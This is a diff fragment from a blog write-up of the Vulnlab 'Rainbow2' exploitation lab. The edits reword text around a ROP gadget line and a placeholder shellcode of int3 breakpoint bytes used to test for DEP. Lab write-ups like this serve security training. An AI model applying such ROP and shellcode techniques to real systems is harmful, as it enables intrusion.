dplastico/dplastico.github.io/_posts/2023-07-02-2023-write_up-Rainbow2-(Vulnlab).md

 rop += p32(filesrv+0x00066ab3) # xchg esp, eax; ret;
 ```

-We can test the above by creating a variable, _Shellcode_.
+We can test the above by creating a variable, _Shellcode_ with the int3 char, that should stop execution, acting as a break-point, if _DEP_ is disabled.

 ```python
 shellcode = b"\xcc"*300
 ```
-And adding it to our payload, as shown below.
+And then, adding it to our payload to be sent, as shown below.

 ```python
 payload  = b""